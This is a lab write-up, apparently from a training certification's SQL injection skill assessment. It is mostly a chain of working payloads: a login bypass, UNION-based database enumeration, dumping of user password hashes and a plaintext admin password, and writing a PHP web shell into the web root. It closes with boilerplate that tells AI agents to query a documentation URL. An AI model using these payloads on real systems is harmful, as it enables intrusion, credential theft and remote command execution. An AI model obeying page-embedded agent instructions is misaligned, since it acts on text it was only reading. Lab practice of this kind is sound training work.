# Skill Assessment

First I can see a login, try to sqli basic -->

```
admin' or 1=1-- -
```

<figure><img src="/files/3I5DngUSqQUhhzZ95IBz" alt=""><figcaption></figcaption></figure>

Then, i can see search panel and info of names, i test if this field is vulnerable:

<figure><img src="/files/lhD6D59DxvgRdzKXA57B" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/KWF2XppvuZzTBGO0t2rX" alt=""><figcaption></figcaption></figure>

It is vulnerable, true. Now i try to connect to unions select -->

```
ADAM' UNION SELECT 1,2,3,4,5-- -
```

<figure><img src="/files/4S3ZR2nRQELkedmBfeiD" alt=""><figcaption></figcaption></figure>

Nice try daddy, now i list the secure\_file\_priv, to view if this field is vulnerable:

```
ADAM' UNION SELECT 1,2, variable_name, variable_value, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
```

<figure><img src="/files/bcaPRmnvmRdtxIRRIlup" alt=""><figcaption></figcaption></figure>

Now, i try to upload a webshell -->

```
adam' union select "",'<?php system($_REQUEST[0]); ?>', "", "", "" into outfile '/var/www/html/shell.php'-- -
```

<figure><img src="/files/eIuqgKeFkZHD92AJKH6j" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3893bYMiZDMR83GKJa0Q" alt=""><figcaption></figcaption></figure>

No problem, i will try display the bbdd and password of admin to login and do it upload

```
ADAM' UNION select 1,schema_name,3,4,5 from INFORMATION_SCHEMA.SCHEMATA-- -
```

<figure><img src="/files/jUB6Dy0dGcJD1DEaC3AL" alt=""><figcaption></figcaption></figure>

List all bbdd, and see ilfreight and backup, nice. I see with database(), what ddbb is using this webapp:

```
ADAM' UNION select 1,database(),2,3,4-- -
```

<figure><img src="/files/H2JhtdNKZXHb82KRSSPg" alt=""><figcaption></figcaption></figure>

NICE, now list all tables, columns and info -->

```
ADAM' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4,5 from INFORMATION_SCHEMA.TABLES where table_schema='ilfreight'-- -
```

<figure><img src="/files/nFAEgblUpUeUvmt1VVl3" alt=""><figcaption></figcaption></figure>

```
ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -
```

<figure><img src="/files/3G52KoDcUnWYvDkSsKaB" alt=""><figcaption></figcaption></figure>

Now we can see all content off this columns -->

```
ADAM' UNION select 1,2, username, password, 4 from ilfreight.users-- -
```

<figure><img src="/files/BXa0pOxcAnwBAG3n9Gzh" alt=""><figcaption></figcaption></figure>

> adam : 1be9f5d3a82847b8acca40544f953515

Try to login again into the login... but...

<figure><img src="/files/pZroWBbW1S8Rv7E5EYSs" alt=""><figcaption></figcaption></figure>

<div data-full-width="false"><figure><img src="/files/BCXzYaaoWoelgAOaU9Bv" alt="" width="281"><figcaption></figcaption></figure></div>

NO SURRENDER! I will try to enum the backup bbdd

<figure><img src="/files/phW6QsjmXxdf232XjHbY" alt=""><figcaption></figcaption></figure>

```
ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -
```

<figure><img src="/files/EddxB79oWjap2HbdmXwA" alt=""><figcaption></figcaption></figure>

Now, i list the columns:

```
ADAM' UNION select 1,2,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='admin_bk'-- -
```

<figure><img src="/files/GvvNN8XJ5rD4TVW4Fd5o" alt=""><figcaption></figcaption></figure>

To the end, i display all data of this comuns -->

```
ADAM' UNION select 1,2, username, password, 4 from backup.admin_bk-- -
```

<figure><img src="/files/F2tvfdM2bEhGg0DZggwx" alt=""><figcaption></figcaption></figure>

> admin : Inl\@n3\_fre1gh7\_adm!n

NOW YEAAAHHH, but... it is the same user i have... sooooo.

<figure><img src="/files/9IQ0pzDv8Tl0IRpOzJrn" alt=""><figcaption></figcaption></figure>

There are something i am doing bad... The above responde message is: Permsion Denied... Yeah... but... the query is it:

```
' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/shell.php'-- -
```

<figure><img src="/files/RSRwf2Al0SKh0CMEzsn0" alt=""><figcaption></figcaption></figure>

"Cant create to file in /var/www/html", but... i am in /dashboad/dasboard.php, try it -->

```
' union select "",'<?php system($_REQUEST[0]); ?>', "","", "" into outfile '/var/www/html/dashboard/shell.php'-- -
```

NOTHING ERROR!! Search the file

<figure><img src="/files/NvSpEJAY3AqhbFTS73V5" alt=""><figcaption></figcaption></figure>

> HOLY SH1T!! I NEED SLEEP

<figure><img src="/files/IznQNNADI0JO1gtKv1Q5" alt="" width="374"><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/sql-injection/skill-assessment.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.